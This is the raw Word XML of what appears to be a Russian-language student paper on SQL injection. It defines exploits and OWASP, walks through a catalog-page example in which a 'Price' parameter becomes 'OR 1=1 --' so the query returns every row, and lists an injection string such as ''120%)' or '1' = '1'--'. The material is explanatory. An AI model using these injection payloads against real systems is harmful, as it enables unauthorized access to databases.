              <w:t>Листинг 5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc420789658 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00EB5DBA" w:rsidRDefault="00D94490">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423C8F" w:rsidRDefault="00423C8F" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc420429529"/>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:p w:rsidR="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc420789642"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00423C8F" w:rsidRPr="00423C8F" w:rsidRDefault="00423C8F" w:rsidP="00423C8F"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="008E55BC" w:rsidRPr="003B32C2" w:rsidRDefault="00F84B90"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sql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сервис-ориентированные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FC4D17" w:rsidRDefault="002C385A" w:rsidP="009A31ED">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>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6C445E" w:rsidRPr="006C445E" w:rsidRDefault="006C445E" w:rsidP="002C385A">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="120" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A31ED">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Цели</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Default="003A515D" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc420789643"/>
      <w:r w:rsidRPr="00A852C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sql-Инъекции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="009A31ED" w:rsidRDefault="004D6608" w:rsidP="00A455ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A455ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ключевые слова</w:t>
      </w:r>
      <w:r w:rsidR="00A455ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="004D6608">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Эксплойт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> — программа, фрагмент программного кода или последовательность команд, использующие уязвимости в коде сайта или программном обеспечении сервера используемые для проведения атаки на сайт или сервер. Целью атаки может быть как получение контроля над сайтом, так и нарушение его функционирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="004D6608">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open</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Web</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Application</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Security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Project</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (OWASP) - это открытый проект обеспечения безопасности </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-приложений</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Сообщество OWASP включает в себя корпорации, образовательные организации и частных лиц со всего мира. Сообщество работает над созданием статей, учебных пособий, документации, инструментов и технологий, находящихся в свободном доступе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6608" w:rsidRPr="004D6608" w:rsidRDefault="004D6608" w:rsidP="00A852C0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="004D6608"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 xml:space="preserve">В сфере </w:t>
      </w:r>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>безопасности интернет технологий</w:t>
      </w:r>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> существует разновидность </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D6608" w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эксплойтов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Top</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Structured</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Query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Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">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4D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>веб-активов</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D6608">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRPr="003B32C2"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Как правило, атаки с использованием SQL-инъекции весьма просты, поэтому удивительно</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,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A852C0" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пример из практики</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Пользователь отправляет запрос http://localhost:8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>catalog</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tables</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asp</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 120 на сервер приложения. В качестве целочисленного параметра </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передается значение 120. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="00291342" w:rsidRDefault="003B7814" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сервер</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приложений</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динамически</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формирует</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL-</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>запрос</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT * FROM tables WHERE Price = 120 ORDER BY Price. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291342"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Из таблицы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извлекаются данные о товарах, цена которых равна 120 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>у.е</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> результат упорядочивается по </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>цене</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> товара. Данные передаются серверу приложений. </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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Сервер приложений формирует результат, который отображается пользователю. Если в качестве параметра передать строку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Pr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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то на сервер СУБД поступит SQL-запрос </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</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w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE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 xml:space="preserve">= </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00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> --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причем часть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 ,будет закомментирована</w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не будет исполняться. Запрос </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">вернёт все </w:t>
      </w:r>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>строки</w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из таблицы </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Products</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, так как условие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является </w:t>
      </w:r>
      <w:r w:rsidR="00291342" w:rsidRPr="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>истинным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7814" w:rsidRPr="003B32C2" w:rsidRDefault="003B7814" w:rsidP="00301693">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00D21A0A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc420429530"/>
    </w:p>
    <w:p w:rsidR="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>
    <w:p w:rsidR="00A852C0" w:rsidRPr="00A852C0" w:rsidRDefault="00A852C0" w:rsidP="00A852C0"/>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291342"/>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bookmarkEnd w:id="3"/>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D21A0A" w:rsidRDefault="00291342" w:rsidP="00291342">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc420789644"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Алгоритм выявления возможности внедрения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-кода</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00291342" w:rsidRPr="00291342" w:rsidRDefault="00291342" w:rsidP="00B73CCD">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00401E79" w:rsidRPr="003B32C2" w:rsidRDefault="00401E79"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Невозможно </w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00FC4D17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>указать</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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9A31ED">
      <w:pPr>
        <w:ind w:firstLine="706"/>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url либо в теле запроса. Для примера - вот что можно вставить вместо "</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Price</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00291342">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00DF708C" w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>":</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E2666F"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8322CE"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rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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p>
    <w:p w:rsidR="008E2951" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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C250C0" w:rsidRPr="00C250C0" w:rsidRDefault="00291342" w:rsidP="008E2951">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C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>120</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0" w:rsidRPr="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%)'</w:t>
      </w:r>
      <w:r w:rsidR="00C250C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or '1' = '1'--</w:t>
      </w:r>
    </w:p>
